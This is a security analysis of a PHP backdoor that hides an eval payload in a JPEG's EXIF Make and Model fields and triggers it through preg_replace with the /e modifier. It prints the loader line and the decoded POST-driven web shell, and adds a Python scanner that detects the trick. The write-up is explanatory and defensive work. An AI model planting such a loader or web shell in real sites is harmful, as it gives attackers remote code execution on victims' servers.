Malicious software hidden in JPG EXIF header information
The backdoor is split into two parts. The first part combines a call to exif_read_data, which reads the image's EXIF header, with a preg_replace call that executes the content it returns.
$exif = exif_read_data('/homepages/Clientsitepath/images/stories/food/bun.jpg'); preg_replace($exif['Make'], $exif['Model'], '');
On their own these two functions are harmless: exif_read_data reads image metadata and preg_replace replaces string content. The trick is a hidden, little-known option of preg_replace: if the pattern carries the "/e" modifier, the replacement is executed (eval) instead of simply substituted for the matched content.
When we look at the bun.jpg file itself, we find the second part of the backdoor:
Ø Oracle ^ @ ^ PJFIF ^ @ ^ A ^ B ^ @ d ^ @ ÿ á^ @ ¡Exif ^ @ II * ^ @ ^ H ^ @ ^ B ^ @ ^ O ^ A ^ B ^ @ ^ F ^ @ & ^ @ ^ P ^ A ^ B ^ @ m ^ @, ^ @/. */e ^ @ eval (base64_decode ("aWYgKGl zc2V0KCRfUE9TVFsie encode = ')); @ ÿ ì ^ @ ^ QDucky ^ @ ^ A ^ @ ^ D ^ @ <^ @ ÿ î ^ @ ^ NAdobe ^
The "/.*/e" stored there is the key: with that modifier, preg_replace executes (eval) the replacement whatever the rest of the pattern matches.
Looking further into the EXIF data, we can see that the "Model" field hides the "eval(base64_decode" payload. Put together, it is clear what happened: the attackers read the Make and Model fields from the EXIF data and feed them straight into preg_replace. Once $exif['Make'] and $exif['Model'] from the file are substituted in, we get the final backdoor:
preg_replace("/.*/e", "@eval(base64_decode('aWYgKGl…'));", "");
Once decoded, we can see that it simply executes whatever content arrives in a POST variable, with no check on what it is:
if (isset($_POST["zz1"])) { eval(stripslashes($_POST["zz1"])); }
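As an added illustration, not part of the original write-up, here is a small Python scanner that parses the APP1 Exif segment itself, pulls the Make and Model tags out of IFD0 and flags the combination described above: a PCRE pattern carrying the /e modifier in one field and an eval/base64_decode payload in the other. The JPEG it inspects is constructed inline; 0x010F and 0x0110 are the standard EXIF tag numbers that exif_read_data exposes as Make and Model.

```python
import re
import struct

TAG_MAKE, TAG_MODEL = 0x010F, 0x0110          # IFD0 tags exif_read_data exposes as Make/Model
# Flags a PCRE pattern whose modifiers include "e", or an eval/base64_decode payload.
SUSPICIOUS = re.compile(r"^(\W).*\1[A-Za-z]*e[A-Za-z]*$|eval\s*\(|base64_decode", re.S)

def exif_ascii_tags(jpeg: bytes) -> dict:
    """Return {tag: value} for the ASCII tags in IFD0 of the first APP1 Exif segment."""
    pos = 2                                    # skip SOI (FF D8)
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):             # EOI / SOS: no EXIF past this point
            break
        size = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + size]
        if marker == 0xE1 and seg.startswith(b"Exif\x00\x00"):
            tiff = seg[6:]
            end = "<" if tiff[:2] == b"II" else ">"   # byte order of the TIFF block
            ifd0 = struct.unpack(end + "I", tiff[4:8])[0]
            count = struct.unpack(end + "H", tiff[ifd0:ifd0 + 2])[0]
            out = {}
            for i in range(count):
                e = tiff[ifd0 + 2 + 12 * i:ifd0 + 14 + 12 * i]
                tag, typ, n, off = struct.unpack(end + "HHII", e)
                if typ == 2:                   # ASCII; values of <= 4 bytes sit inline
                    raw = e[8:8 + n] if n <= 4 else tiff[off:off + n]
                    out[tag] = raw.rstrip(b"\x00").decode("latin-1")
            return out
        pos += 2 + size
    return {}

def scan_exif_backdoor(jpeg: bytes) -> list:
    """Names of the Make/Model fields whose content looks like the preg_replace backdoor."""
    tags = exif_ascii_tags(jpeg)
    return [name for name, tag in (("Make", TAG_MAKE), ("Model", TAG_MODEL))
            if tag in tags and SUSPICIOUS.search(tags[tag])]

def build_jpeg_with_exif(make: str, model: str) -> bytes:
    """Constructed sample: minimal JPEG whose IFD0 holds only Make and Model (> 4 bytes each)."""
    m, d = make.encode() + b"\x00", model.encode() + b"\x00"
    data_off = 8 + 2 + 2 * 12 + 4              # TIFF header + count + 2 entries + next-IFD link
    ifd = struct.pack("<H", 2)
    ifd += struct.pack("<HHII", TAG_MAKE, 2, len(m), data_off)
    ifd += struct.pack("<HHII", TAG_MODEL, 2, len(d), data_off + len(m))
    ifd += struct.pack("<I", 0)
    app1 = b"Exif\x00\x00" + b"II*\x00" + struct.pack("<I", 8) + ifd + m + d
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"
```

The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so on current PHP the preg_replace line fails instead of executing, but the injected Make/Model values still mark the image as tampered and are worth alerting on.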